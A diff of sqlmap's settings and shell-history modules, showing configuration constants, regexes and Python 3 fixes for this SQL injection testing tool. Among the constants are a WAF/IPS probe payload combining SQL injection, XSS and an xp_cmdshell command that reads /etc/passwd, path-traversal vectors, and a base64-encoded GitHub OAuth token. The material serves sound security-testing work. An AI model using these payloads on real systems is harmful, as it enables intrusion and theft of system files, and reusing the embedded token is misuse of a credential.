SUPPORTED_DBMS = MSSQL_ALIASES + MYSQL_ALIASES + PGSQL_ALIASES + ORACLE_ALIASES + SQLITE_ALIASES + ACCESS_ALIASES + FIREBIRD_ALIASES + MAXDB_ALIASES + SYBASE_ALIASES + DB2_ALIASES + HSQLDB_ALIASES + H2_ALIASES + INFORMIX_ALIASES
|
||||||
SUPPORTED_OS = ("linux", "windows")
|
SUPPORTED_OS = ("linux", "windows")
|
||||||
|
|
||||||
DBMS_ALIASES = ((DBMS.MSSQL, MSSQL_ALIASES), (DBMS.MYSQL, MYSQL_ALIASES), (DBMS.PGSQL, PGSQL_ALIASES), (DBMS.ORACLE, ORACLE_ALIASES), (DBMS.SQLITE, SQLITE_ALIASES), (DBMS.ACCESS, ACCESS_ALIASES), (DBMS.FIREBIRD, FIREBIRD_ALIASES), (DBMS.MAXDB, MAXDB_ALIASES), (DBMS.SYBASE, SYBASE_ALIASES), (DBMS.DB2, DB2_ALIASES), (DBMS.HSQLDB, HSQLDB_ALIASES))
|
DBMS_ALIASES = ((DBMS.MSSQL, MSSQL_ALIASES), (DBMS.MYSQL, MYSQL_ALIASES), (DBMS.PGSQL, PGSQL_ALIASES), (DBMS.ORACLE, ORACLE_ALIASES), (DBMS.SQLITE, SQLITE_ALIASES), (DBMS.ACCESS, ACCESS_ALIASES), (DBMS.FIREBIRD, FIREBIRD_ALIASES), (DBMS.MAXDB, MAXDB_ALIASES), (DBMS.SYBASE, SYBASE_ALIASES), (DBMS.DB2, DB2_ALIASES), (DBMS.HSQLDB, HSQLDB_ALIASES), (DBMS.H2, H2_ALIASES), (DBMS.INFORMIX, INFORMIX_ALIASES))
|
||||||
|
|
||||||
USER_AGENT_ALIASES = ("ua", "useragent", "user-agent")
|
USER_AGENT_ALIASES = ("ua", "useragent", "user-agent")
|
||||||
REFERER_ALIASES = ("ref", "referer", "referrer")
|
REFERER_ALIASES = ("ref", "referer", "referrer")
|
||||||
HOST_ALIASES = ("host",)
|
HOST_ALIASES = ("host",)
|
||||||
|
|
||||||
HSQLDB_DEFAULT_SCHEMA = "PUBLIC"
|
H2_DEFAULT_SCHEMA = HSQLDB_DEFAULT_SCHEMA = "PUBLIC"
|
||||||
|
|
||||||
# Names that can't be used to name files on Windows OS
|
# Names that can't be used to name files on Windows OS
|
||||||
WINDOWS_RESERVED_NAMES = ("CON", "PRN", "AUX", "NUL", "COM1", "COM2", "COM3", "COM4", "COM5", "COM6", "COM7", "COM8", "COM9", "LPT1", "LPT2", "LPT3", "LPT4", "LPT5", "LPT6", "LPT7", "LPT8", "LPT9")
|
WINDOWS_RESERVED_NAMES = ("CON", "PRN", "AUX", "NUL", "COM1", "COM2", "COM3", "COM4", "COM5", "COM6", "COM7", "COM8", "COM9", "LPT1", "LPT2", "LPT3", "LPT4", "LPT5", "LPT6", "LPT7", "LPT8", "LPT9")
|
||||||
@@ -291,6 +313,10 @@ BASIC_HELP_ITEMS = (
|
|||||||
"wizard",
|
"wizard",
|
||||||
)
|
)
|
||||||
|
|
||||||
|
# Tags used for value replacements inside shell scripts
|
||||||
|
SHELL_WRITABLE_DIR_TAG = "%WRITABLE_DIR%"
|
||||||
|
SHELL_RUNCMD_EXE_TAG = "%RUNCMD_EXE%"
|
||||||
|
|
||||||
# String representation for NULL value
|
# String representation for NULL value
|
||||||
NULL = "NULL"
|
NULL = "NULL"
|
||||||
|
|
||||||
@@ -300,13 +326,17 @@ BLANK = "<blank>"
|
|||||||
# String representation for current database
|
# String representation for current database
|
||||||
CURRENT_DB = "CD"
|
CURRENT_DB = "CD"
|
||||||
|
|
||||||
|
# Name of SQLite file used for storing session data
|
||||||
|
SESSION_SQLITE_FILE = "session.sqlite"
|
||||||
|
|
||||||
# Regular expressions used for finding file paths in error messages
|
# Regular expressions used for finding file paths in error messages
|
||||||
FILE_PATH_REGEXES = (r"<b>(?P<result>[^<>]+?)</b> on line \d+", r"(?P<result>[^<>'\"]+?)['\"]? on line \d+", r"(?:[>(\[\s])(?P<result>[A-Za-z]:[\\/][\w. \\/-]*)", r"(?:[>(\[\s])(?P<result>/\w[/\w.~-]+)", r"href=['\"]file://(?P<result>/[^'\"]+)")
|
FILE_PATH_REGEXES = (r"<b>(?P<result>[^<>]+?)</b> on line \d+", r"in (?P<result>[^<>'\"]+?)['\"]? on line \d+", r"(?:[>(\[\s])(?P<result>[A-Za-z]:[\\/][\w. \\/-]*)", r"(?:[>(\[\s])(?P<result>/\w[/\w.~-]+)", r"href=['\"]file://(?P<result>/[^'\"]+)")
|
||||||
|
|
||||||
# Regular expressions used for parsing error messages (--parse-errors)
|
# Regular expressions used for parsing error messages (--parse-errors)
|
||||||
ERROR_PARSING_REGEXES = (
|
ERROR_PARSING_REGEXES = (
|
||||||
r"<b>[^<]*(fatal|error|warning|exception)[^<]*</b>:?\s*(?P<result>.+?)<br\s*/?\s*>",
|
r"\[Microsoft\]\[ODBC SQL Server Driver\]\[SQL Server\](?P<result>[^<]+)",
|
||||||
r"(?m)^(fatal|error|warning|exception):?\s*(?P<result>[^\n]+?)$",
|
r"<b>[^<]*(fatal|error|warning|exception)[^<]*</b>:?\s*(?P<result>[^<]+)",
|
||||||
|
r"(?m)^\s*(fatal|error|warning|exception):?\s*(?P<result>[^\n]+?)$",
|
||||||
r"(?P<result>[^\n>]*SQL Syntax[^\n<]+)",
|
r"(?P<result>[^\n>]*SQL Syntax[^\n<]+)",
|
||||||
r"<li>Error Type:<br>(?P<result>.+?)</li>",
|
r"<li>Error Type:<br>(?P<result>.+?)</li>",
|
||||||
r"CDbCommand (?P<result>[^<>\n]*SQL[^<>\n]+)",
|
r"CDbCommand (?P<result>[^<>\n]*SQL[^<>\n]+)",
|
||||||
@@ -333,7 +363,7 @@ COMMON_PASSWORD_SUFFIXES += ("!", ".", "*", "!!", "?", ";", "..", "!!!", ", ", "
|
|||||||
WEBSCARAB_SPLITTER = "### Conversation"
|
WEBSCARAB_SPLITTER = "### Conversation"
|
||||||
|
|
||||||
# Splitter used between requests in BURP log files
|
# Splitter used between requests in BURP log files
|
||||||
BURP_REQUEST_REGEX = r"={10,}\s+[^=]+={10,}\s(.+?)\s={10,}"
|
BURP_REQUEST_REGEX = r"={10,}\s+([A-Z]{3,} .+?)\s+={10,}"
|
||||||
|
|
||||||
# Regex used for parsing XML Burp saved history items
|
# Regex used for parsing XML Burp saved history items
|
||||||
BURP_XML_HISTORY_REGEX = r'<port>(\d+)</port>.+?<request base64="true"><!\[CDATA\[([^]]+)'
|
BURP_XML_HISTORY_REGEX = r'<port>(\d+)</port>.+?<request base64="true"><!\[CDATA\[([^]]+)'
|
||||||
@@ -348,10 +378,10 @@ URI_HTTP_HEADER = "URI"
|
|||||||
URI_INJECTABLE_REGEX = r"//[^/]*/([^\.*?]+)\Z"
|
URI_INJECTABLE_REGEX = r"//[^/]*/([^\.*?]+)\Z"
|
||||||
|
|
||||||
# Regex used for masking sensitive data
|
# Regex used for masking sensitive data
|
||||||
SENSITIVE_DATA_REGEX = "(\s|=)(?P<result>[^\s=]*%s[^\s]*)\s"
|
SENSITIVE_DATA_REGEX = r"(\s|=)(?P<result>[^\s=]*%s[^\s]*)\s"
|
||||||
|
|
||||||
# Options to explicitly mask in anonymous (unhandled exception) reports (along with anything carrying the <hostname> inside)
|
# Options to explicitly mask in anonymous (unhandled exception) reports (along with anything carrying the <hostname> inside)
|
||||||
SENSITIVE_OPTIONS = ("hostname", "data", "dnsDomain", "googleDork", "authCred", "proxyCred", "tbl", "db", "col", "user", "cookie", "proxy", "rFile", "wFile", "dFile", "testParameter", "authCred")
|
SENSITIVE_OPTIONS = ("hostname", "answers", "data", "dnsDomain", "googleDork", "authCred", "proxyCred", "tbl", "db", "col", "user", "cookie", "proxy", "fileRead", "fileWrite", "fileDest", "testParameter", "authCred")
|
||||||
|
|
||||||
# Maximum number of threads (avoiding connection issues and/or DoS)
|
# Maximum number of threads (avoiding connection issues and/or DoS)
|
||||||
MAX_NUMBER_OF_THREADS = 10
|
MAX_NUMBER_OF_THREADS = 10
|
||||||
@@ -372,7 +402,7 @@ CANDIDATE_SENTENCE_MIN_LENGTH = 10
|
|||||||
CUSTOM_INJECTION_MARK_CHAR = '*'
|
CUSTOM_INJECTION_MARK_CHAR = '*'
|
||||||
|
|
||||||
# Other way to declare injection position
|
# Other way to declare injection position
|
||||||
INJECT_HERE_REGEX = '(?i)%INJECT[_ ]?HERE%'
|
INJECT_HERE_REGEX = r"(?i)%INJECT[_ ]?HERE%"
|
||||||
|
|
||||||
# Minimum chunk length used for retrieving data over error based payloads
|
# Minimum chunk length used for retrieving data over error based payloads
|
||||||
MIN_ERROR_CHUNK_LENGTH = 8
|
MIN_ERROR_CHUNK_LENGTH = 8
|
||||||
@@ -390,7 +420,7 @@ REFLECTED_VALUE_MARKER = "__REFLECTED_VALUE__"
|
|||||||
REFLECTED_BORDER_REGEX = r"[^A-Za-z]+"
|
REFLECTED_BORDER_REGEX = r"[^A-Za-z]+"
|
||||||
|
|
||||||
# Regular expression used for replacing non-alphanum characters
|
# Regular expression used for replacing non-alphanum characters
|
||||||
REFLECTED_REPLACEMENT_REGEX = r".+"
|
REFLECTED_REPLACEMENT_REGEX = r"[^\n]{1,100}"
|
||||||
|
|
||||||
# Maximum time (in seconds) spent per reflective value(s) replacement
|
# Maximum time (in seconds) spent per reflective value(s) replacement
|
||||||
REFLECTED_REPLACEMENT_TIMEOUT = 3
|
REFLECTED_REPLACEMENT_TIMEOUT = 3
|
||||||
@@ -410,9 +440,15 @@ DEFAULT_MSSQL_SCHEMA = "dbo"
|
|||||||
# Display hash attack info every mod number of items
|
# Display hash attack info every mod number of items
|
||||||
HASH_MOD_ITEM_DISPLAY = 11
|
HASH_MOD_ITEM_DISPLAY = 11
|
||||||
|
|
||||||
|
# Display marker for (cracked) empty password
|
||||||
|
HASH_EMPTY_PASSWORD_MARKER = "<empty>"
|
||||||
|
|
||||||
# Maximum integer value
|
# Maximum integer value
|
||||||
MAX_INT = sys.maxint
|
MAX_INT = sys.maxint
|
||||||
|
|
||||||
|
# Replacement for unsafe characters in dump table filenames
|
||||||
|
UNSAFE_DUMP_FILEPATH_REPLACEMENT = '_'
|
||||||
|
|
||||||
# Options that need to be restored in multiple targets run mode
|
# Options that need to be restored in multiple targets run mode
|
||||||
RESTORE_MERGED_OPTIONS = ("col", "db", "dnsDomain", "privEsc", "tbl", "regexp", "string", "textOnly", "threads", "timeSec", "tmpPath", "uChar", "user")
|
RESTORE_MERGED_OPTIONS = ("col", "db", "dnsDomain", "privEsc", "tbl", "regexp", "string", "textOnly", "threads", "timeSec", "tmpPath", "uChar", "user")
|
||||||
|
|
||||||
@@ -468,7 +504,7 @@ LEGAL_DISCLAIMER = "Usage of sqlmap for attacking targets without prior mutual c
|
|||||||
REFLECTIVE_MISS_THRESHOLD = 20
|
REFLECTIVE_MISS_THRESHOLD = 20
|
||||||
|
|
||||||
# Regular expression used for extracting HTML title
|
# Regular expression used for extracting HTML title
|
||||||
HTML_TITLE_REGEX = "<title>(?P<result>[^<]+)</title>"
|
HTML_TITLE_REGEX = r"<title>(?P<result>[^<]+)</title>"
|
||||||
|
|
||||||
# Table used for Base64 conversion in WordPress hash cracking routine
|
# Table used for Base64 conversion in WordPress hash cracking routine
|
||||||
ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
|
ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
|
||||||
@@ -493,9 +529,6 @@ BRUTE_TABLE_EXISTS_TEMPLATE = "EXISTS(SELECT %d FROM %s)"
|
|||||||
# Template used for common column existence check
|
# Template used for common column existence check
|
||||||
BRUTE_COLUMN_EXISTS_TEMPLATE = "EXISTS(SELECT %s FROM %s)"
|
BRUTE_COLUMN_EXISTS_TEMPLATE = "EXISTS(SELECT %s FROM %s)"
|
||||||
|
|
||||||
# Payload used for checking of existence of IDS/IPS/WAF (dummier the better)
|
|
||||||
IDS_WAF_CHECK_PAYLOAD = "AND 1=1 UNION ALL SELECT 1,NULL,'<script>alert(\"XSS\")</script>',table_name FROM information_schema.tables WHERE 2>1--/**/; EXEC xp_cmdshell('cat ../../../etc/passwd')#"
|
|
||||||
|
|
||||||
# Data inside shellcodeexec to be filled with random string
|
# Data inside shellcodeexec to be filled with random string
|
||||||
SHELLCODEEXEC_RANDOM_STRING_MARKER = "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"
|
SHELLCODEEXEC_RANDOM_STRING_MARKER = "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"
|
||||||
|
|
||||||
@@ -505,13 +538,16 @@ CHECK_INTERNET_ADDRESS = "https://ipinfo.io/"
|
|||||||
# Value to look for in response to CHECK_INTERNET_ADDRESS
|
# Value to look for in response to CHECK_INTERNET_ADDRESS
|
||||||
CHECK_INTERNET_VALUE = "IP Address Details"
|
CHECK_INTERNET_VALUE = "IP Address Details"
|
||||||
|
|
||||||
# Vectors used for provoking specific WAF/IPS/IDS behavior(s)
|
# Payload used for checking of existence of WAF/IPS (dummier the better)
|
||||||
|
IPS_WAF_CHECK_PAYLOAD = "AND 1=1 UNION ALL SELECT 1,NULL,'<script>alert(\"XSS\")</script>',table_name FROM information_schema.tables WHERE 2>1--/**/; EXEC xp_cmdshell('cat ../../../etc/passwd')#"
|
||||||
|
|
||||||
|
# Vectors used for provoking specific WAF/IPS behavior(s)
|
||||||
WAF_ATTACK_VECTORS = (
|
WAF_ATTACK_VECTORS = (
|
||||||
"", # NIL
|
"", # NIL
|
||||||
"search=<script>alert(1)</script>",
|
"search=<script>alert(1)</script>",
|
||||||
"file=../../../../etc/passwd",
|
"file=../../../../etc/passwd",
|
||||||
"q=<invalid>foobar",
|
"q=<invalid>foobar",
|
||||||
"id=1 %s" % IDS_WAF_CHECK_PAYLOAD
|
"id=1 %s" % IPS_WAF_CHECK_PAYLOAD
|
||||||
)
|
)
|
||||||
|
|
||||||
# Used for status representation in dictionary attack phase
|
# Used for status representation in dictionary attack phase
|
||||||
@@ -520,7 +556,7 @@ ROTATING_CHARS = ('\\', '|', '|', '/', '-')
|
|||||||
# Approximate chunk length (in bytes) used by BigArray objects (only last chunk and cached one are held in memory)
|
# Approximate chunk length (in bytes) used by BigArray objects (only last chunk and cached one are held in memory)
|
||||||
BIGARRAY_CHUNK_SIZE = 1024 * 1024
|
BIGARRAY_CHUNK_SIZE = 1024 * 1024
|
||||||
|
|
||||||
# Compress (zlib) level used for storing BigArray chunks to disk (0-9)
|
# Compress level used for storing BigArray chunks to disk (0-9)
|
||||||
BIGARRAY_COMPRESS_LEVEL = 9
|
BIGARRAY_COMPRESS_LEVEL = 9
|
||||||
|
|
||||||
# Maximum number of socket pre-connects
|
# Maximum number of socket pre-connects
|
||||||
@@ -552,7 +588,7 @@ UNION_CHAR_REGEX = r"\A\w+\Z"
|
|||||||
UNENCODED_ORIGINAL_VALUE = "original"
|
UNENCODED_ORIGINAL_VALUE = "original"
|
||||||
|
|
||||||
# Common column names containing usernames (used for hash cracking in some cases)
|
# Common column names containing usernames (used for hash cracking in some cases)
|
||||||
COMMON_USER_COLUMNS = ("login", "user", "username", "user_name", "user_login", "benutzername", "benutzer", "utilisateur", "usager", "consommateur", "utente", "utilizzatore", "usufrutuario", "korisnik", "usuario", "consumidor", "client", "cuser")
|
COMMON_USER_COLUMNS = ("login", "user", "username", "user_name", "user_login", "benutzername", "benutzer", "utilisateur", "usager", "consommateur", "utente", "utilizzatore", "utilizator", "utilizador", "usufrutuario", "korisnik", "uporabnik", "usuario", "consumidor", "client", "cuser")
|
||||||
|
|
||||||
# Default delimiter in GET/POST values
|
# Default delimiter in GET/POST values
|
||||||
DEFAULT_GET_POST_DELIMITER = '&'
|
DEFAULT_GET_POST_DELIMITER = '&'
|
||||||
@@ -564,7 +600,7 @@ DEFAULT_COOKIE_DELIMITER = ';'
|
|||||||
FORCE_COOKIE_EXPIRATION_TIME = "9999999999"
|
FORCE_COOKIE_EXPIRATION_TIME = "9999999999"
|
||||||
|
|
||||||
# Github OAuth token used for creating an automatic Issue for unhandled exceptions
|
# Github OAuth token used for creating an automatic Issue for unhandled exceptions
|
||||||
GITHUB_REPORT_OAUTH_TOKEN = "NTMyNWNkMmZkMzRlMDZmY2JkMmY0MGI4NWI0MzVlM2Q5YmFjYWNhYQ=="
|
GITHUB_REPORT_OAUTH_TOKEN = "NTYzYjhmZWJjYzc0Njg2ODJhNzhmNDg1YzM0YzlkYjk3N2JiMzE3Nw=="
|
||||||
|
|
||||||
# Skip unforced HashDB flush requests below the threshold number of cached items
|
# Skip unforced HashDB flush requests below the threshold number of cached items
|
||||||
HASHDB_FLUSH_THRESHOLD = 32
|
HASHDB_FLUSH_THRESHOLD = 32
|
||||||
@@ -579,7 +615,7 @@ HASHDB_RETRIEVE_RETRIES = 3
|
|||||||
HASHDB_END_TRANSACTION_RETRIES = 3
|
HASHDB_END_TRANSACTION_RETRIES = 3
|
||||||
|
|
||||||
# Unique milestone value used for forced deprecation of old HashDB values (e.g. when changing hash/pickle mechanism)
|
# Unique milestone value used for forced deprecation of old HashDB values (e.g. when changing hash/pickle mechanism)
|
||||||
HASHDB_MILESTONE_VALUE = "dPHoJRQYvs" # python -c 'import random, string; print "".join(random.sample(string.ascii_letters, 10))'
|
HASHDB_MILESTONE_VALUE = "BZzRotigLX" # python -c 'import random, string; print "".join(random.sample(string.ascii_letters, 10))'
|
||||||
|
|
||||||
# Warn user of possible delay due to large page dump in full UNION query injections
|
# Warn user of possible delay due to large page dump in full UNION query injections
|
||||||
LARGE_OUTPUT_THRESHOLD = 1024 ** 2
|
LARGE_OUTPUT_THRESHOLD = 1024 ** 2
|
||||||
@@ -612,7 +648,7 @@ BANNER = re.sub(r"\[.\]", lambda _: "[\033[01;41m%s\033[01;49m]" % random.sample
|
|||||||
DUMMY_NON_SQLI_CHECK_APPENDIX = "<'\">"
|
DUMMY_NON_SQLI_CHECK_APPENDIX = "<'\">"
|
||||||
|
|
||||||
# Regular expression used for recognition of file inclusion errors
|
# Regular expression used for recognition of file inclusion errors
|
||||||
FI_ERROR_REGEX = "(?i)[^\n]{0,100}(no such file|failed (to )?open)[^\n]{0,100}"
|
FI_ERROR_REGEX = r"(?i)[^\n]{0,100}(no such file|failed (to )?open)[^\n]{0,100}"
|
||||||
|
|
||||||
# Length of prefix and suffix used in non-SQLI heuristic checks
|
# Length of prefix and suffix used in non-SQLI heuristic checks
|
||||||
NON_SQLI_CHECK_PREFIX_SUFFIX_LENGTH = 6
|
NON_SQLI_CHECK_PREFIX_SUFFIX_LENGTH = 6
|
||||||
@@ -621,7 +657,7 @@ NON_SQLI_CHECK_PREFIX_SUFFIX_LENGTH = 6
|
|||||||
MAX_CONNECTION_CHUNK_SIZE = 10 * 1024 * 1024
|
MAX_CONNECTION_CHUNK_SIZE = 10 * 1024 * 1024
|
||||||
|
|
||||||
# Maximum response total page size (trimmed if larger)
|
# Maximum response total page size (trimmed if larger)
|
||||||
MAX_CONNECTION_TOTAL_SIZE = 50 * 1024 * 1024
|
MAX_CONNECTION_TOTAL_SIZE = 100 * 1024 * 1024
|
||||||
|
|
||||||
# For preventing MemoryError exceptions (caused when using large sequences in difflib.SequenceMatcher)
|
# For preventing MemoryError exceptions (caused when using large sequences in difflib.SequenceMatcher)
|
||||||
MAX_DIFFLIB_SEQUENCE_LENGTH = 10 * 1024 * 1024
|
MAX_DIFFLIB_SEQUENCE_LENGTH = 10 * 1024 * 1024
|
||||||
@@ -642,7 +678,7 @@ VALID_TIME_CHARS_RUN_THRESHOLD = 100
|
|||||||
CHECK_ZERO_COLUMNS_THRESHOLD = 10
|
CHECK_ZERO_COLUMNS_THRESHOLD = 10
|
||||||
|
|
||||||
# Boldify all logger messages containing these "patterns"
|
# Boldify all logger messages containing these "patterns"
|
||||||
BOLD_PATTERNS = ("' injectable", "provided empty", "leftover chars", "might be injectable", "' is vulnerable", "is not injectable", "does not seem to be", "test failed", "test passed", "live test final result", "test shows that", "the back-end DBMS is", "created Github", "blocked by the target server", "protection is involved", "CAPTCHA", "specific response", "NULL connection is supported")
|
BOLD_PATTERNS = ("' injectable", "provided empty", "leftover chars", "might be injectable", "' is vulnerable", "is not injectable", "does not seem to be", "test failed", "test passed", "live test final result", "test shows that", "the back-end DBMS is", "created Github", "blocked by the target server", "protection is involved", "CAPTCHA", "specific response", "NULL connection is supported", "PASSED", "FAILED")
|
||||||
|
|
||||||
# Generic www root directory names
|
# Generic www root directory names
|
||||||
GENERIC_DOC_ROOT_DIRECTORY_NAMES = ("htdocs", "httpdocs", "public", "wwwroot", "www")
|
GENERIC_DOC_ROOT_DIRECTORY_NAMES = ("htdocs", "httpdocs", "public", "wwwroot", "www")
|
||||||
@@ -654,7 +690,7 @@ MAX_HELP_OPTION_LENGTH = 18
|
|||||||
MAX_CONNECT_RETRIES = 100
|
MAX_CONNECT_RETRIES = 100
|
||||||
|
|
||||||
# Strings for detecting formatting errors
|
# Strings for detecting formatting errors
|
||||||
FORMAT_EXCEPTION_STRINGS = ("Type mismatch", "Error converting", "Conversion failed", "String or binary data would be truncated", "Failed to convert", "unable to interpret text value", "Input string was not in a correct format", "System.FormatException", "java.lang.NumberFormatException", "ValueError: invalid literal", "DataTypeMismatchException", "CF_SQL_INTEGER", " for CFSQLTYPE ", "cfqueryparam cfsqltype", "InvalidParamTypeException", "Invalid parameter type", "is not of type numeric", "<cfif Not IsNumeric(", "invalid input syntax for integer", "invalid input syntax for type", "invalid number", "character to number conversion error", "unable to interpret text value", "String was not recognized as a valid", "Convert.ToInt", "cannot be converted to a ", "InvalidDataException")
|
FORMAT_EXCEPTION_STRINGS = ("Type mismatch", "Error converting", "Please enter a", "Conversion failed", "String or binary data would be truncated", "Failed to convert", "unable to interpret text value", "Input string was not in a correct format", "System.FormatException", "java.lang.NumberFormatException", "ValueError: invalid literal", "TypeMismatchException", "CF_SQL_INTEGER", " for CFSQLTYPE ", "cfqueryparam cfsqltype", "InvalidParamTypeException", "Invalid parameter type", "is not of type numeric", "<cfif Not IsNumeric(", "invalid input syntax for integer", "invalid input syntax for type", "invalid number", "character to number conversion error", "unable to interpret text value", "String was not recognized as a valid", "Convert.ToInt", "cannot be converted to a ", "InvalidDataException")
|
||||||
|
|
||||||
# Regular expression used for extracting ASP.NET view state values
|
# Regular expression used for extracting ASP.NET view state values
|
||||||
VIEWSTATE_REGEX = r'(?i)(?P<name>__VIEWSTATE[^"]*)[^>]+value="(?P<result>[^"]+)'
|
VIEWSTATE_REGEX = r'(?i)(?P<name>__VIEWSTATE[^"]*)[^>]+value="(?P<result>[^"]+)'
|
||||||
@@ -729,7 +765,7 @@ EVALCODE_KEYWORD_SUFFIX = "_KEYWORD"
|
|||||||
NETSCAPE_FORMAT_HEADER_COOKIES = "# Netscape HTTP Cookie File."
|
NETSCAPE_FORMAT_HEADER_COOKIES = "# Netscape HTTP Cookie File."
|
||||||
|
|
||||||
# Infixes used for automatic recognition of parameters carrying anti-CSRF tokens
|
# Infixes used for automatic recognition of parameters carrying anti-CSRF tokens
|
||||||
CSRF_TOKEN_PARAMETER_INFIXES = ("csrf", "xsrf")
|
CSRF_TOKEN_PARAMETER_INFIXES = ("csrf", "xsrf", "token")
|
||||||
|
|
||||||
# Prefixes used in brute force search for web server document root
|
# Prefixes used in brute force search for web server document root
|
||||||
BRUTE_DOC_ROOT_PREFIXES = {
|
BRUTE_DOC_ROOT_PREFIXES = {
|
||||||
@@ -767,9 +803,9 @@ tr:nth-child(even) {
|
|||||||
background-color: #D3DFEE
|
background-color: #D3DFEE
|
||||||
}
|
}
|
||||||
td{
|
td{
|
||||||
font-size:10px;
|
font-size:12px;
|
||||||
}
|
}
|
||||||
th{
|
th{
|
||||||
font-size:10px;
|
font-size:12px;
|
||||||
}
|
}
|
||||||
</style>"""
|
</style>"""
|
||||||
|
|||||||
@@ -1,7 +1,7 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'LICENSE' for copying permission
|
See the file 'LICENSE' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
@@ -9,6 +9,7 @@ import atexit
|
|||||||
import os
|
import os
|
||||||
|
|
||||||
from lib.core import readlineng as readline
|
from lib.core import readlineng as readline
|
||||||
|
from lib.core.common import getSafeExString
|
||||||
from lib.core.data import logger
|
from lib.core.data import logger
|
||||||
from lib.core.data import paths
|
from lib.core.data import paths
|
||||||
from lib.core.enums import AUTOCOMPLETE_TYPE
|
from lib.core.enums import AUTOCOMPLETE_TYPE
|
||||||
@@ -53,28 +54,33 @@ def clearHistory():
|
|||||||
readline.clear_history()
|
readline.clear_history()
|
||||||
|
|
||||||
def saveHistory(completion=None):
|
def saveHistory(completion=None):
|
||||||
if not readlineAvailable():
|
|
||||||
return
|
|
||||||
|
|
||||||
if completion == AUTOCOMPLETE_TYPE.SQL:
|
|
||||||
historyPath = paths.SQL_SHELL_HISTORY
|
|
||||||
elif completion == AUTOCOMPLETE_TYPE.OS:
|
|
||||||
historyPath = paths.OS_SHELL_HISTORY
|
|
||||||
else:
|
|
||||||
historyPath = paths.SQLMAP_SHELL_HISTORY
|
|
||||||
|
|
||||||
try:
|
try:
|
||||||
with open(historyPath, "w+"):
|
if not readlineAvailable():
|
||||||
|
return
|
||||||
|
|
||||||
|
if completion == AUTOCOMPLETE_TYPE.SQL:
|
||||||
|
historyPath = paths.SQL_SHELL_HISTORY
|
||||||
|
elif completion == AUTOCOMPLETE_TYPE.OS:
|
||||||
|
historyPath = paths.OS_SHELL_HISTORY
|
||||||
|
elif completion == AUTOCOMPLETE_TYPE.API:
|
||||||
|
historyPath = paths.API_SHELL_HISTORY
|
||||||
|
else:
|
||||||
|
historyPath = paths.SQLMAP_SHELL_HISTORY
|
||||||
|
|
||||||
|
try:
|
||||||
|
with open(historyPath, "w+"):
|
||||||
|
pass
|
||||||
|
except:
|
||||||
pass
|
pass
|
||||||
except:
|
|
||||||
pass
|
|
||||||
|
|
||||||
readline.set_history_length(MAX_HISTORY_LENGTH)
|
readline.set_history_length(MAX_HISTORY_LENGTH)
|
||||||
try:
|
try:
|
||||||
readline.write_history_file(historyPath)
|
readline.write_history_file(historyPath)
|
||||||
except IOError, msg:
|
except IOError as ex:
|
||||||
warnMsg = "there was a problem writing the history file '%s' (%s)" % (historyPath, msg)
|
warnMsg = "there was a problem writing the history file '%s' (%s)" % (historyPath, getSafeExString(ex))
|
||||||
logger.warn(warnMsg)
|
logger.warn(warnMsg)
|
||||||
|
except KeyboardInterrupt:
|
||||||
|
pass
|
||||||
|
|
||||||
def loadHistory(completion=None):
|
def loadHistory(completion=None):
|
||||||
if not readlineAvailable():
|
if not readlineAvailable():
|
||||||
@@ -86,14 +92,16 @@ def loadHistory(completion=None):
|
|||||||
historyPath = paths.SQL_SHELL_HISTORY
|
historyPath = paths.SQL_SHELL_HISTORY
|
||||||
elif completion == AUTOCOMPLETE_TYPE.OS:
|
elif completion == AUTOCOMPLETE_TYPE.OS:
|
||||||
historyPath = paths.OS_SHELL_HISTORY
|
historyPath = paths.OS_SHELL_HISTORY
|
||||||
|
elif completion == AUTOCOMPLETE_TYPE.API:
|
||||||
|
historyPath = paths.API_SHELL_HISTORY
|
||||||
else:
|
else:
|
||||||
historyPath = paths.SQLMAP_SHELL_HISTORY
|
historyPath = paths.SQLMAP_SHELL_HISTORY
|
||||||
|
|
||||||
if os.path.exists(historyPath):
|
if os.path.exists(historyPath):
|
||||||
try:
|
try:
|
||||||
readline.read_history_file(historyPath)
|
readline.read_history_file(historyPath)
|
||||||
except IOError, msg:
|
except IOError as ex:
|
||||||
warnMsg = "there was a problem loading the history file '%s' (%s)" % (historyPath, msg)
|
warnMsg = "there was a problem loading the history file '%s' (%s)" % (historyPath, getSafeExString(ex))
|
||||||
logger.warn(warnMsg)
|
logger.warn(warnMsg)
|
||||||
|
|
||||||
def autoCompletion(completion=None, os=None, commands=None):
|
def autoCompletion(completion=None, os=None, commands=None):
|
||||||
@@ -104,20 +112,20 @@ def autoCompletion(completion=None, os=None, commands=None):
|
|||||||
if os == OS.WINDOWS:
|
if os == OS.WINDOWS:
|
||||||
# Reference: http://en.wikipedia.org/wiki/List_of_DOS_commands
|
# Reference: http://en.wikipedia.org/wiki/List_of_DOS_commands
|
||||||
completer = CompleterNG({
|
completer = CompleterNG({
|
||||||
"copy": None, "del": None, "dir": None,
|
"copy": None, "del": None, "dir": None,
|
||||||
"echo": None, "md": None, "mem": None,
|
"echo": None, "md": None, "mem": None,
|
||||||
"move": None, "net": None, "netstat -na": None,
|
"move": None, "net": None, "netstat -na": None,
|
||||||
"ver": None, "xcopy": None, "whoami": None,
|
"ver": None, "xcopy": None, "whoami": None,
|
||||||
})
|
})
|
||||||
|
|
||||||
else:
|
else:
|
||||||
# Reference: http://en.wikipedia.org/wiki/List_of_Unix_commands
|
# Reference: http://en.wikipedia.org/wiki/List_of_Unix_commands
|
||||||
completer = CompleterNG({
|
completer = CompleterNG({
|
||||||
"cp": None, "rm": None, "ls": None,
|
"cp": None, "rm": None, "ls": None,
|
||||||
"echo": None, "mkdir": None, "free": None,
|
"echo": None, "mkdir": None, "free": None,
|
||||||
"mv": None, "ifconfig": None, "netstat -natu": None,
|
"mv": None, "ifconfig": None, "netstat -natu": None,
|
||||||
